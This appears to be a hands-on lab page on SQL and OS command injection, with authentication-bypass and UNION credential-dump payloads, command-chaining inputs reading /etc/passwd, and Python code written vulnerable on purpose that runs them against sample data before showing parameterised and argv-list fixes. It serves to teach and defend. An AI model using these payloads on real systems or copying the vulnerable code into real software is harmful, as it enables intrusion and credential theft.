Master the art of exploiting injection vulnerabilities
What are Injection Attacks?
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
🎯 Common Injection Types
SQL Injection: Manipulating database queries through user input
Command Injection: Executing arbitrary operating system commands
LDAP Injection: Exploiting LDAP queries for authentication bypass
XPath Injection: Manipulating XML path language queries
Scenario: You're testing a web application's login system that appears vulnerable to SQL injection. Your goals: bypass authentication and extract sensitive data from the database.
💡 SQL Injection Payloads to Try:
Authentication Bypass (the comment sequence discards the rest of the WHERE clause; in MySQL `--` must be followed by whitespace, and `#` is MySQL-specific):
admin' OR '1'='1' --
' OR 1=1 #
Data Extraction (a UNION only succeeds when the injected SELECT returns the same number of columns, with compatible types, as the original query):
' UNION SELECT username,password FROM users --
' UNION SELECT table_name,column_name FROM information_schema.columns --
Objectives:
1. Bypass login authentication using SQL injection
2. Extract user credentials from the database
3. Discover hidden administrative accounts
📊 Database Schema Discovery
TABLE: users
+--------------+--------------+------+-----+---------+
| Field        | Type         | Null | Key | Default |
+--------------+--------------+------+-----+---------+
| id           | int(11)      | NO   | PRI | NULL    |
| username     | varchar(50)  | NO   |     | NULL    |
| password     | varchar(50)  | NO   |     | NULL    |
| role         | varchar(20)  | NO   |     | user    |
| email        | varchar(100) | YES  |     | NULL    |
+--------------+--------------+------+-----+---------+
TABLE: admin_secrets
+--------------+--------------+------+-----+---------+
| Field        | Type         | Null | Key | Default |
+--------------+--------------+------+-----+---------+
| id           | int(11)      | NO   | PRI | NULL    |
| secret       | text         | NO   |     | NULL    |
| access_level | int(1)       | NO   |     | 1       |
+--------------+--------------+------+-----+---------+
🚨 SQL Injection Vulnerability Analysis
This application is vulnerable because it:
String Concatenation: Builds the SQL statement by concatenating user input into the query text, so a quote in the input ends the string literal and the rest is parsed as SQL
No Input Validation: Accepts any characters, including SQL metacharacters such as ', --, # and ;
Excessive Privileges: The application's database user can read every table, including admin_secrets, instead of only the rows the login needs
Error Disclosure: Returns raw SQL error messages, which reveal the query structure and table and column names an attacker needs to craft a working UNION
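The following is an added example, not the lab's own code, that reproduces the flaw described above (string concatenation with no validation) against an SQLite copy of the users and admin_secrets tables and runs the bypass and UNION payloads from the payload list against it. The row contents are constructed sample data; SQLite has no information_schema, so the schema-discovery payload queries sqlite_master instead, and the `#` comment form is omitted because SQLite does not support it. The parameterised login_safe shows why binding the input as data defeats every one of these payloads.

```python
import sqlite3


def make_db():
    """Constructed sample data shaped like the lab's schema (assumption, not the lab's DB)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL,
            role TEXT NOT NULL DEFAULT 'user', email TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t', 'admin', 'admin@example.test');
        INSERT INTO users VALUES (2, 'alice', 'wonderland', 'user', NULL);
        INSERT INTO users VALUES (3, 'svc_backup', 'backd00r', 'admin', NULL);
        CREATE TABLE admin_secrets (
            id INTEGER PRIMARY KEY, secret TEXT NOT NULL,
            access_level INTEGER NOT NULL DEFAULT 1);
        INSERT INTO admin_secrets VALUES (1, 'constructed-sample-secret', 3);
    """)
    return conn


def login_vulnerable(conn, username, password):
    """The flaw: user input is spliced into the SQL text, so a quote closes the
    literal and everything after it is parsed as SQL."""
    sql = ("SELECT id, username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """The fix: a parameterised query binds the input as data; the SQL text is
    fixed before the user's value is ever seen by the parser."""
    sql = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Payloads from the lab, plus a SQLite-specific schema dump (sqlite_master stands
# in for information_schema.columns). All three injected SELECTs return three
# columns to match the original query.
BYPASS = "admin' OR '1'='1' --"
DUMP_CREDS = "' UNION SELECT id, username, password FROM users --"
DUMP_SCHEMA = "' UNION SELECT 1, name, sql FROM sqlite_master WHERE type='table' --"
HIDDEN_ADMINS = "' UNION SELECT id, username, role FROM users WHERE role='admin' --"


if __name__ == "__main__":
    db = make_db()
    for label, payload in [("bypass", BYPASS), ("creds", DUMP_CREDS),
                           ("schema", DUMP_SCHEMA), ("admins", HIDDEN_ADMINS)]:
        print(label, login_vulnerable(db, payload, "wrong-password"))
    print("safe  ", login_safe(db, BYPASS, "wrong-password"))
```

Each vulnerable call returns rows the login should never have produced: the bypass returns every user, the credential dump places password values in the role column, and the schema dump lists both tables. The same payloads return nothing from login_safe, and the correct credentials still authenticate.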
⚡ Lab 2: OS Command Injection Challenge
Scenario: You've found a network diagnostic tool that allows users to ping hosts. The application appears to execute system commands directly. Exploit this to gain unauthorized system access.
💡 Command Injection Payloads:
Command Chaining:
google.com; whoami
google.com && cat /etc/passwd
Pipes and Redirection (the pipe feeds ping's output to the injected command, which still runs; 2>/dev/null hides permission errors from the file search):
google.com | ls -la
google.com; find / -name "*.conf" 2>/dev/null
Mission Objectives:
1. Execute basic system commands (whoami, pwd, ls)
2. Access sensitive system files (/etc/passwd, /etc/hosts)
3. Discover system configuration and running processes
Escalation Target: Find the flag in /var/secrets/flag.txt
🚨 Command Injection Vulnerability
This application is vulnerable because it:
system()-style Execution: Passes the user-supplied host to a shell as part of a command string without sanitization, so shell metacharacters (;, &&, |) are interpreted as command separators
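The following is an added example, not the diagnostic tool's own code, that reproduces the system()-style flaw above in Python and shows the chaining payloads from the payload list working against it, then the two changes that close it: an allow-list check on the hostname and an argv list so no shell is involved. It assumes a Linux host with iputils ping (the -W option is seconds there) and uses 127.0.0.1 with an echo marker as the constructed injected command so it runs offline.

```python
import re
import subprocess

# Allow-list for what a ping target may look like: letters, digits, dots and
# hyphens, no leading hyphen so the value can never be parsed as a ping option
# such as -f. This pattern is an assumption of the example, not the tool's rule.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")


def ping_vulnerable(host):
    """The flaw: the host is pasted into a command line that a shell parses,
    exactly like system("ping -c 1 " + host) in C. Anything after ; && or |
    becomes a second command running with the application's privileges."""
    cmd = "ping -c 1 -W 1 " + host
    r = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=20)
    return r.stdout + r.stderr


def validate_host(host):
    """Reject anything that is not a plain hostname or IPv4 literal."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    return host


def ping_safe(host):
    """The fix: validate first, then pass argv as a list. With no shell in the
    path, ';' or '|' in the value would only ever reach ping as a literal
    hostname, and the allow-list stops even that from being attempted."""
    host = validate_host(host)
    r = subprocess.run(["ping", "-c", "1", "-W", "1", host],
                       capture_output=True, text=True, timeout=20)
    return r.stdout + r.stderr


if __name__ == "__main__":
    # Constructed injected input: ping runs (or fails), then the chained command runs.
    print(ping_vulnerable("127.0.0.1; echo INJECTED; whoami"))
    for bad in ["google.com; whoami", "google.com && cat /etc/passwd",
                "google.com | ls -la", "-f"]:
        try:
            ping_safe(bad)
        except ValueError as e:
            print("rejected:", e)
```

Passing a list to subprocess.run is the part that removes the bug; the allow-list is defence in depth that also blocks option injection (a value beginning with -) and keeps the error path from ever invoking ping with attacker-shaped input. Quoting with shlex.quote is a weaker substitute that still depends on a shell parsing the result correctly.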